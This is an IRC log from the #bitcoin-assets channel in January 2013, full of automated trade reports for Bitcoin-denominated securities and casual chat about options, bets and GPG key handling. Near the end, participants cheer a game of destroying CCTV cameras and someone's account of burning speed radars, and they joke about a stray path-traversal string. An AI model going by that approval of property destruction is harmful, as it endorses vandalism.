@ 0.0006209 = 3.2169 BTC [+] Jan 25 09:07:03 [MPEX] [S.MPOE] 10519 @ 0.00062071 = 6.5292 BTC [-] Jan 25 09:07:18 [MPEX] [S.DICE] 700 @ 0.00616081 = 4.3126 BTC [-] Jan 25 09:07:20 [MPEX] [S.DICE] 550 @ 0.00621929 = 3.4206 BTC [+] Jan 25 09:07:21 [MPEX] [S.DICE] 621 @ 0.00627457 = 3.8965 BTC [+] Jan 25 09:07:22 [MPEX] [S.DICE] 1539 @ 0.00632181 = 9.7293 BTC [+] Jan 25 09:07:24 [MPEX] [S.DICE] 5000 @ 0.0063388 = 31.694 BTC [+] Jan 25 09:07:25 [MPEX] [S.DICE] 5634 @ 0.00635807 = 35.8214 BTC [+] Jan 25 09:07:26 [MPEX] [S.DICE] 1810 @ 0.00635808 = 11.5081 BTC [+] Jan 25 09:41:25 [MPEX] [S.MPOE] 5750 @ 0.00062323 = 3.5836 BTC [+] Jan 25 09:41:27 [MPEX] [S.MPOE] 4125 @ 0.00062071 = 2.5604 BTC [-] Jan 25 09:41:28 [MPEX] [S.MPOE] 900 @ 0.000616 = 0.5544 BTC [-] Jan 25 09:41:29 [MPEX] [S.MPOE] 5075 @ 0.000615 = 3.1211 BTC [-] Jan 25 09:56:56 [MPEX] [S.MPOE] 7900 @ 0.000615 = 4.8585 BTC [-] Jan 25 10:01:49 ;;later tell MadSweeney had any problems with exercise? looks like you didn't do anything Jan 25 10:01:49 The operation succeeded. Jan 25 10:03:12 everyone - if you buy options with coinbr, exercise link will show right on the dashboard., Jan 25 10:19:27 also in the news : https://bitcointalk.org/index.php?topic=137459.msg1478063#msg1478063 Jan 25 10:19:31 usagi is setting trends Jan 25 10:20:58 [MPEX] [S.MPOE] 1900 @ 0.000615 = 1.1685 BTC [-] Jan 25 10:25:07 uh oh, javascript pgp? what did the world come to? Jan 25 10:26:27 use generically named textarea like "password" for gpg private key. Jan 25 10:26:40 watch the browser to autosuggest it everywhere Jan 25 10:26:43 pwnage Jan 25 10:28:03 well you just don't have use a generic named textarea... Jan 25 10:28:42 looks like i have to add auth to mpexagent and convert it to self-containing exe to prevent such insanity Jan 25 10:29:04 then you'll just jsonrpc call it and gpg key will stay safer Jan 25 10:29:31 watch the browser to autosuggest it everywhere lolz Jan 25 10:30:03 [MPEX] [S.MPOE] 680 @ 0.00063769 = 0.4336 BTC [+] Jan 25 10:30:04 [MPEX] [S.MPOE] 6970 @ 0.0006403 = 4.4629 BTC [+] Jan 25 10:37:47 [BTCTC] [BASIC-MINING] 3 @ 0.34 = 1.02 BTC [+] Jan 25 10:39:35 Namworld, that was just the first idea what could go wrong. Of many. Jan 25 10:39:50 cu later Jan 25 10:40:58 hmm, what would you suggest? Jan 25 10:47:31 Catalan parliament approves declaration of state sovereignty Jan 25 10:52:53 =O Jan 25 10:54:58 wow - 21k on a 50% bet @ sd Jan 25 10:55:13 $ Jan 25 10:55:33 You can bet such large amounts? Jan 25 10:55:42 further 16k just now Jan 25 10:56:22 [MPEX] [S.MPOE] 9350 @ 0.00062707 = 5.8631 BTC [-] Jan 25 10:56:42 good point Namworld Jan 25 10:57:18 the website suggests 500 btc is max Jan 25 10:58:21 i think they changed the rules recently, Jan 25 10:58:26 lifted the maxes maybe ? Jan 25 10:58:48 [MPEX] [S.MPOE] 450 @ 0.00063282 = 0.2848 BTC [+] Jan 25 10:59:21 don't large bets just get returned? Jan 25 11:06:47 [MPEX] [S.DICE] 10101 @ 0.00635808 = 64.223 BTC [+] Jan 25 11:06:49 [MPEX] [S.DICE] 508 @ 0.00643207 = 3.2675 BTC [+] Jan 25 11:06:49 [MPEX] [S.DICE] 125 @ 0.0064867 = 0.8108 BTC [+] Jan 25 11:06:50 [MPEX] [S.DICE] 3000 @ 0.0065 = 19.5 BTC [+] Jan 25 11:06:52 [MPEX] [S.DICE] 2044 @ 0.00654688 = 13.3818 BTC [+] Jan 25 11:06:53 [MPEX] [S.DICE] 1119 @ 0.00699 = 7.8218 BTC [+] Jan 25 11:06:54 [MPEX] [S.DICE] 110 @ 0.00699 = 0.7689 BTC [+] Jan 25 11:07:46 markedathome i think so Jan 25 12:02:31 [MPEX] [S.MPOE] 125 @ 0.000615 = 0.0769 BTC [-] Jan 25 12:02:33 [MPEX] [S.MPOE] 7725 @ 0.000614 = 4.7432 BTC [-] Jan 25 12:13:16 [MPEX] [S.MPOE] 2275 @ 0.000614 = 1.3969 BTC [-] Jan 25 12:13:18 [MPEX] [S.MPOE] 1575 @ 0.00061382 = 0.9668 BTC [-] Jan 25 12:24:23 [MPEX] [S.MPOE] 2987 @ 0.00062661 = 1.8717 BTC [+] Jan 25 12:32:00 [MPEX] [S.MPOE] 213 @ 0.00062661 = 0.1335 BTC [+] Jan 25 12:32:02 [MPEX] [S.MPOE] 4163 @ 0.0006348 = 2.6427 BTC [+] Jan 25 12:40:08 [MPEX] [S.MPOE] 10600 @ 0.00062023 = 6.5744 BTC [-] Jan 25 12:40:09 [MPEX] [S.MPOE] 2100 @ 0.00061382 = 1.289 BTC [-] Jan 25 12:52:35 [BTCTC] [GSDPT] 1000 @ 0.0064 = 6.4 BTC [+] Jan 25 13:17:26 Namworld, since mpexagent is done with twisted engine, it should be trivial to add some file serving Jan 25 13:17:52 so user basically starts it, puts gpg passphrase into popup window Jan 25 13:18:19 and from then on he'll use http://localhost:port to interact with it and send cmds to mpex Jan 25 13:18:36 via browser. Jan 25 13:18:57 the passphrase will be entered outside browser and only once Jan 25 13:19:45 can't be simpler that that, while keeping reasonable safety Jan 25 13:21:56 i'll look into it next week Jan 25 13:31:30 eh Jan 25 13:46:54 [MPEX] [S.MPOE] 13000 @ 0.00062345 = 8.1049 BTC [+] Jan 25 13:46:55 [MPEX] [S.MPOE] 1450 @ 0.00061743 = 0.8953 BTC [-] Jan 25 13:52:03 gah all those sites starting wioth bitcoin Jan 25 13:52:15 fucking bane of urls, i have to type the whoel thing all the time Jan 25 13:53:46 [MPEX] [S.MPOE] 8150 @ 0.00061743 = 5.0321 BTC [-] Jan 25 13:58:21 [MPEX] [S.MPOE] 2500 @ 0.00062575 = 1.5644 BTC [+] Jan 25 13:58:23 [MPEX] [S.MPOE] 5600 @ 0.00063118 = 3.5346 BTC [+] Jan 25 14:01:57 [MPEX] [S.DICE] 600 @ 0.00636679 = 3.8201 BTC [-] Jan 25 14:03:36 mircea_popescu: bitinstant Jan 25 14:04:11 ya they're better. Jan 25 14:05:04 http://www.nydailynews.com/news/national/olympian-worked-call-girl-article-1.1224594 Jan 25 14:05:07 [BTCTC] [BASIC-MINING] 28 @ 0.34 = 9.52 BTC [+] Jan 25 14:05:11 da fuck is irrational about 600 an hour lmao Jan 25 14:19:34 [MPEX] [S.MPOE] 4100 @ 0.00063118 = 2.5878 BTC [+] Jan 25 14:19:36 [MPEX] [S.MPOE] 5837 @ 0.0006348 = 3.7053 BTC [+] Jan 25 14:19:37 [MPEX] [S.MPOE] 263 @ 0.0006403 = 0.1684 BTC [+] Jan 25 14:38:55 [MPEX] [S.DICE] 566 @ 0.00636679 = 3.6036 BTC [-] **** BEGIN LOGGING AT Fri Jan 25 15:19:48 2013 Jan 25 15:33:35 ;;bids 16.5 Jan 25 15:33:37 There are currently 2007.564 bitcoins demanded at or over 16.5 USD, worth 33464.9531412 USD in total. Jan 25 15:50:24 [MPEX] [S.MPOE] 6514 @ 0.00062512 = 4.072 BTC [-] Jan 25 16:18:27 ;;seen smickles Jan 25 16:18:27 smickles was last seen in #bitcoin-assets 12 hours, 13 minutes, and 29 seconds ago: i sold at 19, gox turned it into 16 Jan 25 16:50:29 ;;ticker Jan 25 16:50:29 BTCUSD ticker | Best bid: 17.19700, Best ask: 17.20000, Bid-ask spread: 0.00300, Last trade: 17.20000, 24 hour volume: 166494.43264560, 24 hour low: 15.38613, 24 hour high: 19.18999, 24 hour vwap: 17.09456 Jan 25 16:50:50 ;;bc,24hrpc Jan 25 16:50:50 Error: "bc,24hrpc" is not a valid command. Jan 25 16:50:59 ;;bc Jan 25 16:50:59 Error: "bc" is not a valid command. Jan 25 16:51:05 ;;bc,24hrcp Jan 25 16:51:06 Error: "bc,24hrcp" is not a valid command. Jan 25 16:51:46 mircea_popescu i summon theeeee Jan 25 17:02:58 [MPEX] [S.MPOE] 3000 @ 0.00062553 = 1.8766 BTC [+] Jan 25 17:02:59 [MPEX] [S.MPOE] 18868 @ 0.00062 = 11.6982 BTC [-] Jan 25 17:03:01 [MPEX] [S.MPOE] 7150 @ 0.00061906 = 4.4263 BTC [-] Jan 25 17:03:01 [MPEX] [S.MPOE] 2529 @ 0.00061898 = 1.5654 BTC [-] Jan 25 17:03:26 ;;seen bugpowder Jan 25 17:03:26 bugpowder was last seen in #bitcoin-assets 11 hours, 41 minutes, and 43 seconds ago: I predict 24hprc at opex will be $16.20 Jan 25 17:06:00 [MPEX] [S.DICE] 993 @ 0.00654141 = 6.4956 BTC [+] Jan 25 17:07:16 [MPEX] [S.MPOE] 11100 @ 0.00062705 = 6.9603 BTC [+] Jan 25 17:07:18 [MPEX] [S.MPOE] 4900 @ 0.00062963 = 3.0852 BTC [+] Jan 25 17:07:35 [MPEX] [S.BBET] 300 @ 0.0010499 = 0.315 BTC [-] Jan 25 17:08:03 [MPEX] [S.DICE] 1987 @ 0.00654141 = 12.9978 BTC [+] Jan 25 17:11:10 [MPEX] [S.MPOE] 972 @ 0.00061898 = 0.6016 BTC [-] Jan 25 17:11:11 [MPEX] [S.MPOE] 5728 @ 0.00061753 = 3.5372 BTC [-] Jan 25 17:19:17 ;;seen smickles Jan 25 17:19:17 smickles was last seen in #bitcoin-assets 13 hours, 14 minutes, and 19 seconds ago: i sold at 19, gox turned it into 16 Jan 25 17:36:48 [MPEX] [S.MPOE] 838 @ 0.00061754 = 0.5175 BTC [+] Jan 25 17:36:50 [MPEX] [S.MPOE] 2062 @ 0.00061753 = 1.2733 BTC [-] Jan 25 17:41:17 bah all these people offering me stock tips, warning about my failed ach transfers, wanting me in their linkedin networks and whatnot. Jan 25 17:41:23 srsly, in 2013, still ? Jan 25 17:41:34 how long can the shit go on ? Jan 25 17:42:05 [HAVELOCK] [SDICE] 1 @ 0.57 BTC [+] Jan 25 17:42:29 ??? Jan 25 17:42:41 they can add me on linked, i have you quoted there. Jan 25 17:43:36 [MPEX] [S.MPOE] 5850 @ 0.0006276 = 3.6715 BTC [+] Jan 25 17:43:38 [MPEX] [S.MPOE] 1750 @ 0.00062963 = 1.1019 BTC [+] Jan 25 17:44:26 i deleted my linked in account Jan 25 17:44:28 ls Jan 25 17:44:34 .. Jan 25 17:44:35 . Jan 25 17:44:54 cd ../../../../../../.. Jan 25 17:44:56 oops Jan 25 17:45:07 LFI hacker! Jan 25 17:45:25 LFI? Jan 25 17:45:47 well it wouldn't be aremote file inclusion with a path like that Jan 25 17:46:40 http://hakipedia.com/index.php/Local_File_Inclusion Jan 25 17:58:27 [MPEX] [S.MPOE] 2500 @ 0.00061797 = 1.5449 BTC [-] Jan 25 17:58:29 [MPEX] [S.MPOE] 450 @ 0.00061753 = 0.2779 BTC [-] Jan 25 17:58:54 what is with the wackly price range on Bitcoin 24? Buy: $25 Sell: $16.5 I see the sell price being manipulated often too, especially late novermber early december. Sell price dropping sometimes to $1, $3, $7, $10 Jan 25 18:06:47 DeaDTerra: you cant yet until the exchange is up Jan 25 18:11:40 hey DeaDTerra Jan 25 18:11:46 skype Jan 25 18:14:04 [HAVELOCK] [KCIM] 1 @ 0.99999999 BTC [+] Jan 25 18:19:22 [MPEX] [S.MPOE] 4960 @ 0.00061753 = 3.0629 BTC [-] Jan 25 18:19:23 [MPEX] [S.MPOE] 1040 @ 0.0006175 = 0.6422 BTC [-] Jan 25 18:29:42 [MPEX] [S.MPOE] 4050 @ 0.00062963 = 2.55 BTC [+] Jan 25 18:37:03 [HAVELOCK] [SDICE] 14 @ 0.56899999 = 7.966 BTC [-] Jan 25 18:38:31 hmm, price raising again Jan 25 18:38:37 ;;ticker Jan 25 18:38:38 BTCUSD ticker | Best bid: 17.30000, Best ask: 17.39900, Bid-ask spread: 0.09900, Last trade: 17.39900, 24 hour volume: 165052.52438769, 24 hour low: 15.38613, 24 hour high: 19.18999, 24 hour vwap: 17.04471 Jan 25 18:38:41 sweet. Jan 25 18:38:44 just exercised my puts, more profit Jan 25 18:39:00 i thought you had calls ? Jan 25 18:39:11 I sold them for 20% profit Jan 25 18:39:22 106 > 128 BTC Jan 25 18:39:27 The bought puts Jan 25 18:39:37 > 212 BTC Jan 25 18:39:40 Then* Jan 25 18:39:55 hmmm Jan 25 18:40:03 a good for you then Jan 25 18:40:03 pretty much almost exactly 100% profit Jan 25 18:43:53 grats :) Jan 25 18:45:47 calling the top/bottom like that is a sure path to riches. Jan 25 18:45:50 course, failing to... Jan 25 18:46:52 "Hi Monster Tent, thank you for allowing me to answer this question today." Jan 25 18:47:18 Of course... but with high volatility, the average price is often much higher or lower than the average used Jan 25 18:48:07 So you know which side the average is more likely to go. You start winning if the price stays the same Jan 25 18:48:37 but high volatility by definition means price won't. Jan 25 18:48:57 That's certainly an improvement of odds. But the same high volatility is what could get you =/ Jan 25 18:54:44 i did not really call the top/bottom either. Jan 25 18:55:10 I exercise after the fact. The average moves slowly. Jan 25 18:59:44 [MPEX] [S.DICE] 30 @ 0.00654141 = 0.1962 BTC [+] Jan 25 19:00:44 [MPEX] [O.BTCUSD.C160N] 3 @ 0.26379201 = 0.7914 BTC [-] Jan 25 19:01:02 ;;ticker Jan 25 19:01:03 BTCUSD ticker | Best bid: 17.52251, Best ask: 17.59999, Bid-ask spread: 0.07748, Last trade: 17.61000, 24 hour volume: 161095.15098185, 24 hour low: 15.38613, 24 hour high: 19.18999, 24 hour vwap: 16.97983 Jan 25 19:01:31 one last push Jan 25 19:01:39 so the 16 callers make their money Jan 25 19:02:44 yeah Jan 25 19:03:19 I usually can't help but stick around when I have something going on with money on the line. Jan 25 19:05:19 http://www.silverdoctors.com/wp-content/uploads/2013/01/geico-cancels-insurance.jpg Jan 25 19:05:21 fake ? Jan 25 19:08:06 !ticker m S.MPOE Jan 25 19:08:08 [MPEX:S.MPOE] 1D: 0.00061382 / 0.0006764 / 0.0007 (11630051 shares, 7,866.59 BTC), 7D: 0.00059445 / 0.0006509 / 0.0007 (23088165 shares, 15,028.31 BTC), 30D: 0.00059445 / 0.00065031 / 0.0007 (51767859 shares, 33,665.41 BTC) Jan 25 19:08:20 a lot at .0007 got bought Jan 25 19:08:43 XD congrats mircea ipo phase 2 is now over, what are you going to do now? Disney World? Jan 25 19:09:26 nah Jan 25 19:09:42 disney is possibnly the least appealing place for me. Jan 25 19:09:42 oh wait it wasn't all the .0007's Jan 25 19:09:50 someone is going to come in and buy those out Jan 25 19:10:11 my question for you is how do you fight off regulation if it comes? Jan 25 19:10:59 !ticker m S.DICE Jan 25 19:11:01 [MPEX:S.DICE] 1D: 0.00598118 / 0.00635118 / 0.00699 (54282 shares, 344.76 BTC), 7D: 0.00085848 / 0.00452853 / 0.00699 (982193 shares, 4,447.89 BTC), 30D: 0.00085848 / 0.00417522 / 0.00699 (10255161 shares, 42,817.64 BTC) Jan 25 19:11:16 what country would regulate? Jan 25 19:11:34 whatever country does, there's 250 more that haven't yet. Jan 25 19:11:47 as they do, it will go underground, no? Jan 25 19:12:02 depends. Jan 25 19:12:41 Milky about? Jan 25 19:12:47 maybe they make me the ecb governor, Jan 25 19:12:51 god knows the previous ones sucked. Jan 25 19:14:38 weight 93`683 on http://bitbet.us/bet/159/bitcoin-mtgox-18-00-before-march-1st-2013/ didn't get paid out Jan 25 19:17:38 did you bet? Jan 25 19:18:13 I did Jan 25 19:18:47 im lookin into it Jan 25 19:19:03 yee Jan 25 19:19:20 i've never bet @ bitbet. do you just send money to an address and it returns it or not? Jan 25 19:19:42 aye Jan 25 19:19:59 When you bet you can pick the return type - a specified addy or the sending addy Jan 25 19:20:01 dasher : 9093b44f3300f0a89938ccbfcbe1139673c572c4d9011c124a83ad4137a59233 Jan 25 19:21:18 Search that page for the payout amount of 0.10673077 Mircea Jan 25 19:21:34 you had a .2 and a .1 Jan 25 19:21:39 they were conflated into a .3xxx Jan 25 19:21:46 12V6zN1RQGx2hAjwhVzJGSD3iTobp1uxKc 0.32011061 BTC Jan 25 19:21:53 ah - it rolled into the same payment :duh: Jan 25 19:21:59 ta Jan 25 19:22:02 yes if you make multiple bets on the same side for the same bet Jan 25 19:22:06 you get only 1 payout Jan 25 19:22:13 this is better because it lowers your wallet fragmentation Jan 25 19:22:21 tldr : you pay less in fees later. Jan 25 19:22:39 ta Jan 25 19:26:08 my worked blocked blockchain.info since yesterday Jan 25 19:26:14 jerks Jan 25 19:26:30 lol Jan 25 19:26:34 um why ? Jan 25 19:26:52 URL: http://blockchain.info/ URL Categories: Reputation: Medium Risk Media Type: Client IP: 10.9.7.4 Rule Name: IDEXX-Default Catch All Proxy Name: wme-swg1 Jan 25 19:27:08 cause it contains SD interface Jan 25 19:27:09 with a link to the employe computer handbook Jan 25 19:27:19 ah, possibly. Jan 25 19:27:58 lol Jan 25 19:28:04 its General Zod Jan 25 19:28:58 or Zorg Jan 25 19:29:27 [BTCTC] [BASIC-MINING] 50 @ 0.34 = 17 BTC [+] Jan 25 19:29:33 deadweasel: no, doesnt have the hair to the side for Zorg Jan 25 19:30:12 or funny little dog Jan 25 19:30:32 is that the same suit as in that camel/egypt pic Jan 25 19:31:03 [MPEX] [S.MPOE] 1300 @ 0.00062963 = 0.8185 BTC [+] Jan 25 19:31:25 translate damn blog Jan 25 19:31:46 kakobrekla that ? Jan 25 19:32:07 great translation google: Faced with some people who think and man becomes a true gibbon, throwing feces around the world. Jan 25 19:32:14 ha Jan 25 19:32:19 http://chinezu.eu/wp-content/uploads/2010/03/gizeh_pyramids.jpg Jan 25 19:32:40 ok, that suit, same as which ? Jan 25 19:32:50 same as 18:27.28 ( EskimoBob_afk ) http://images.zoso.ro/img/2010/01/mircea_popescu.jpg Jan 25 19:33:00 nope Jan 25 19:33:43 are those clothes comfortable? Jan 25 19:34:34 well mine are. Jan 25 19:35:13 what the crap is a gibbon throwing feces Jan 25 19:35:28 shit. Jan 25 19:35:52 quote the original sentence an' i'll trnalsate for ya. Jan 25 19:36:33 nah i read it and understood the context Jan 25 19:36:43 you have haters and drama in your blog-ville Jan 25 19:37:13 tons. Jan 25 19:37:46 romania pretty much consists of a buncha kids trying to make ends meet on +-5k a year Jan 25 19:37:55 i am a little bit too much to digest. Jan 25 19:38:28 [BTCTC] [RSM] 100 @ 0.0086 = 0.86 BTC [+] Jan 25 19:38:41 [BTCTC] [B.YABMC] 5 @ 0.09 = 0.45 BTC Jan 25 19:38:47 must be all those fancy gold chains you wear Jan 25 19:38:56 haters are jealous Jan 25 19:39:09 Ever seen the South Park episode about the romanian quintuplets? Jan 25 19:39:17 i haven't Jan 25 19:39:36 me either Jan 25 19:39:38 [BTCTC] [B.YABMC] 4 @ 0.0163 = 0.0652 BTC [-] Jan 25 19:39:40 [BTCTC] [B.YABMC] 14 @ 0.0163 = 0.2282 BTC [-] Jan 25 19:40:08 http://en.wikipedia.org/wiki/Quintuplets_2000 Jan 25 19:40:35 ever seen the romanian triplets camhos ? Jan 25 19:40:59 o yeah i saw that 1. Jan 25 19:41:59 is romania like dat? Jan 25 19:42:01 haha Jan 25 19:42:01 i kid Jan 25 19:42:16 like what tho lol. Jan 25 19:42:26 people don't talk by having the upper half of their head move Jan 25 19:42:53 http://www.guardian.co.uk/theguardian/shortcuts/2013/jan/25/game-destroy-cctv-cameras-berlin Jan 25 19:42:59 now that sounds like fun Jan 25 19:43:12 i thought that's what canadians did... Jan 25 19:43:20 Terrance and Phillip Jan 25 19:43:22 I thought that was a goal in portal 1 Jan 25 19:43:45 pretty good idea. Jan 25 19:43:50 man if i had a portal gun the things i could do Jan 25 19:44:29 do some things then maybe you get a portal gun Jan 25 19:44:39 you could do things like you do in Postal Jan 25 19:44:43 it just so happens I'm selling a portal gun for 500btc, you pay now! Jan 25 19:44:54 Postal was a terrible game though. Jan 25 19:45:03 [MPEX] [S.MPOE] 8841 @ 0.00063172 = 5.585 BTC [+] Jan 25 19:45:05 [MPEX] [S.MPOE] 1493 @ 0.0006329 = 0.9449 BTC [+] Jan 25 19:45:15 well, it was postal. Jan 25 19:45:23 you could pee o things Jan 25 19:45:24 on* Jan 25 19:45:40 " They claim to have snuffed out as many as 50 cameras since the game began a few weeks ago." Jan 25 19:45:47 god damned yurpeans, 0 work efficiency. Jan 25 19:45:56 aren't you european? Jan 25 19:46:01 it takes x people several weeks to destroy 50 cams ?! Jan 25 19:46:15 we had a simmilar occurance a few weeks ago Jan 25 19:46:20 burning radars Jan 25 19:46:20 thestringpuller in the great european tradition, i am european only when it's convenient to be so. Jan 25 19:46:37 about 50 or so in ~10 days Jan 25 19:46:37 :D Jan 25 19:48:22 that's pretty efficient Jan 25 19:48:34 good on ya! Jan 25 19:54:09 ;;ticker Jan 25 19:54:10 BTCUSD ticker | Best bid: 17.57934, Best ask: 17.67700, Bid-ask spread: 0.09766, Last trade: 17.56491, 24 hour volume: 150106.82667480, 24 hour low: 15.38613, 24 hour high: 18.89998, 24 hour vwap: 16.82826 Jan 25 20:00:53 [MPEX] [O.BTCUSD.C170N] 3 @ 0.23108932 = 0.6933 BTC [-] Jan 25 20:05:38 !ticker bitch Jan 25 20:05:39 The round stones beneath the earth... have spoken through the fire. Jan 25 20:05:51 amen. Jan 25 20:08:34 lol at assbot quotes Jan 25 20:15:16 Namworld, go watch Dead man Jan 25 20:16:34 hmm Jan 25 20:16:48 http://www.imdb.com/title/tt0112817/ Jan 25 20:16:50 this. Jan 25 20:21:56 [MPEX] [S.MPOE] 10902 @ 0.00063144 = 6.884 BTC [-] Jan 25 20:24:08 http://www.youtube.com/watch?v=d0uUM9tGY5Q Jan 25 20:30:12 there ya go, full movie 10 parts http://www.youtube.com/watch?v=ZtUB8XCrqPg Jan 25 20:30:21 lol spreading the word ? Jan 25 20:30:36 me? Jan 25 20:31:33 ye Jan 25 20:31:50 i guess im trying to raise awarance :) Jan 25 20:31:58 :) Jan 25 20:31:59 its a great flick, i watch it often Jan 25 20:32:19 the only movie i repeat to watch really Jan 25 20:32:39 i do not believe i have watched that Jan 25 20:33:02 "We are sorry to shareholders that we are now >2-month delayed against the original plan. (Late Dec. against Late Oct. to get the chips, plus 4-5 weeks against 2-3 weeks to fully deploy). The status are resulted in by a mix of our optimistic projection, our conservative action and our un-developed relation in the electric manufacturing field." Jan 25 20:33:04 neil young made the soundtrack recoding live while watching the movie Jan 25 20:33:08 guess the failsic. Jan 25 20:33:51 eh Jan 25 20:33:55 that shit is not full movie at all Jan 25 20:34:03 apparently it was removed Jan 25 20:34:08 too bad Jan 25 20:34:23 jcpham, leech it off somewhere Jan 25 20:35:03 Jim Jarmusch - Dead Man (1995) ? Jan 25 20:35:05 [HAVELOCK] [KCIM] 1 @ 0.9892 BTC [-] Jan 25 20:35:08 yes Jan 25 20:36:09 thnaks kakobrekla this sounds interesting Jan 25 20:36:42 bASIC was dead 2 weekends ago when Graet email ozcoin miners Jan 25 20:36:59 the forum is slow to respond Jan 25 20:37:30 [BTCTC] [BTC-BOND] 1000 @ 0.01 = 10 BTC [+] Jan 25 20:37:31 Well if anyone is interested, there's 3 increased coupons on BTC-BOND for the next 3 days Jan 25 20:37:40 Well looks like someone noticed already Jan 25 20:39:05 [HAVELOCK] [KCIM] 3 @ 0.98911 = 2.9673 BTC [-] Jan 25 20:48:05 [HAVELOCK] [SDICE] 1 @ 0.569 BTC [+] Jan 25 20:48:06 [HAVELOCK] [SDICE] 9 @ 0.57 = 5.13 BTC [+] Jan 25 20:48:08 [HAVELOCK] [SDICE] 20 @ 0.57 = 11.4 BTC [+] Jan 25 20:48:09 [HAVELOCK] [SDICE] 4 @ 0.575 = 2.3 BTC [+] Jan 25 20:51:52 [MPEX] [S.MPOE] 5707 @ 0.0006329 = 3.612 BTC [+] Jan 25 20:51:54 [MPEX] [S.MPOE] 6550 @ 0.00063318 = 4.1473 BTC [+] Jan 25 20:51:55 [MPEX] [S.MPOE] 2043 @ 0.00063364 = 1.2945 BTC [+] Jan 25 20:53:39 [BTCTC] [GSDPT] 5 @ 0.0067 = 0.0335 BTC [+] Jan 25 20:56:47 [BTCTC] [BTC-BOND] 5 @ 0.0097 = 0.0485 BTC [-] Jan 25 20:56:49 [BTCTC] [BTC-BOND] 10 @ 0.0097 = 0.097 BTC [-] Jan 25 20:56:50 [BTCTC] [BTC-BOND] 11 @ 0.0097 = 0.1067 BTC [-] Jan 25 20:57:01 ;;ticker Jan 25 20:57:02 BTCUSD ticker | Best bid: 16.79719, Best ask: 16.80000, Bid-ask spread: 0.00281, Last trade: 16.80000, 24 hour volume: 142013.99203525, 24 hour low: 15.38613, 24 hour high: 18.25000, 24 hour vwap: 16.69648 Jan 25 20:57:10 ;;bc,24hprc Jan 25 20:57:11 16.73 Jan 25 20:57:16 !ticker h sdice Jan 25 20:57:19 [HAVELOCK:SDICE] 1D: 0.44000000 / 0.53724797 / 0.57500000 (123 shares, 66.08149986 BTC), 7D: 0.44000000 / 0.54953918 / 0.62000000 (1013 shares, 556.68318952 BTC), 30D: 0.37000000 / 0.47735229 / 0.62000000 (4741 shares, 2263.12718940 BTC) Jan 25 20:58:14 topace did you get any of the selloff btw ? Jan 25 20:58:30 from the other night? Jan 25 20:58:41 yea Jan 25 20:58:46 not much, i think i had 10000 bid listed at 0.52 or something Jan 25 20:58:49 that got filled Jan 25 20:58:50 when it went to .008 or w/e Jan 25 20:58:57 0.0008 Jan 25 20:59:00 heh yea Jan 25 20:59:00 ya Jan 25 20:59:08 wish i had some lower bids in :p Jan 25 20:59:29 im curious who the sniper was Jan 25 20:59:36 havelock has 345,000 shares -- getting up there Jan 25 20:59:39 [MPEX] [S.MPOE] 3570 @ 0.00063144 = 2.2542 BTC [-] Jan 25 20:59:43 I wish I had known and taken the 500k at 0.0008 Jan 25 20:59:57 400btc well spent lol Jan 25 21:00:07 yeah Jan 25 21:00:23 maybe not 1000% returns on them, but 500% for sure Jan 25 21:00:31 and people say pirate was a ponzi. Jan 25 21:00:44 so not! Jan 25 21:00:56 I was making almost as much on GLBSE stocks volatility... Jan 25 21:01:02 pirate was curdled milk by comparison lol Jan 25 21:01:04 I love volatility Jan 25 21:01:14 Namworld i doubt you were making 500% over 400 btc. Jan 25 21:01:23 Not that much Jan 25 21:01:31 But close to pirate at 7% per week Jan 25 21:01:34 a Jan 25 21:01:47 I was close to doubling my amount every 3 months Jan 25 21:02:01 tho by the end the volume on GLBSE was limiting me. Jan 25 21:02:02 yes, the thing with btc securities is, trading fees very small, volatility kinda high Jan 25 21:02:12 if you know what you're doing it should make decent returns Jan 25 21:02:30 course it will crowd in time, as people start grasping it Jan 25 21:02:37 Well anyway, I'm taking off. Back in about 30 minutes Jan 25 21:02:47 Namworld, you should prolly open investment fund in bitfunder or so Jan 25 21:02:59 doesn't he have one ? Jan 25 21:03:12 these 2% bondses? Jan 25 21:03:18 iirc he had some sort of fund Jan 25 21:03:23 cause i remember looking over an asset sheet Jan 25 21:03:35 It was for BTC-BOND Jan 25 21:03:49 I had a 200% loan value in assets guarantee Jan 25 21:04:14 I was forced to remove it and reduce interest for anyone transfering to BTCT.co Jan 25 21:04:26 Paid out the others Jan 25 21:04:28 forced ?! Jan 25 21:04:36 anyway, bbl! Jan 25 21:04:38 Well, with GLBSE down Jan 25 21:04:57 Where were my 200% in GLBSE assets? All gone. I'm slowly getting money back Jan 25 21:05:15 Plus I felt I was guaranteeing too much interest Jan 25 21:05:35 jurov: no fund when I can borrow at 10.95% per year =/ Jan 25 21:05:44 DIVE DIVE DIVE Jan 25 21:05:48 and keep profits Jan 25 21:05:57 lol, i can borrow at 0% for 3 weeks :P Jan 25 21:06:05 sweet Jan 25 21:06:54 FUCK Jan 25 21:06:58 16.60 average Jan 25 21:07:02 dude Jan 25 21:07:14 24vwap is gonna keep falling Jan 25 21:07:17 no matter what happens Jan 25 21:07:20 I lost lots of money selling my puts Jan 25 21:07:31 I am making a killing right now Jan 25 21:07:35 eh Jan 25 21:09:18 ;;ticker Jan 25 21:09:18 BTCUSD ticker | Best bid: 17.01651, Best ask: 17.05000, Bid-ask spread: 0.03349, Last trade: 16.85900, 24 hour volume: 141238.37356347, 24 hour low: 15.38613, 24 hour high: 18.25000, 24 hour vwap: 16.68190 Jan 25 21:18:05 [HAVELOCK] [SDICE] 6 @ 0.575 = 3.45 BTC [+] Jan 25 21:20:05 [HAVELOCK] [SDICE] 15 @ 0.595 = 8.925 BTC [+] Jan 25 21:25:55 i am making a killing? either you sold and made one, or you have paper Jan 25 21:26:56 anyone invested with bitfunder? Jan 25 21:27:34 how is it so far? Jan 25 21:28:15 so how many of these https://www.litecoinglobal.com/security/S.BBET-PT equals one S.BBET ? Jan 25 21:29:59 dunno 1:1? Jan 25 21:32:24 its kinda funny Jan 25 21:32:51 Mk Cap: 2,537 i'm thinking that's shares? Jan 25 21:32:58 who runs that pt actually ? Jan 25 21:33:26 !ticker m s.bbet Jan 25 21:33:28 [MPEX:S.BBET] 1D: 0.0010499 / 0.00111197 / 0.001139 (989 shares, 1.10 BTC), 7D: 0.00100006 / 0.00102592 / 0.00129998 (23060 shares, 23.66 BTC), 30D: 0.000337 / 0.00078442 / 0.0035 (2269672 shares, 1,780.38 BTC) Jan 25 21:33:31 Deprived does Jan 25 21:33:36 "deprived" https://bitcointalk.org/index.php?topic=136912.0 Jan 25 21:33:47 ;;calc 0.001*2537 Jan 25 21:33:47 2.537 Jan 25 21:33:57 wow. Jan 25 21:34:02 someone should point out to deprived it;s spelled underlying Jan 25 21:34:09 i saw that ;) 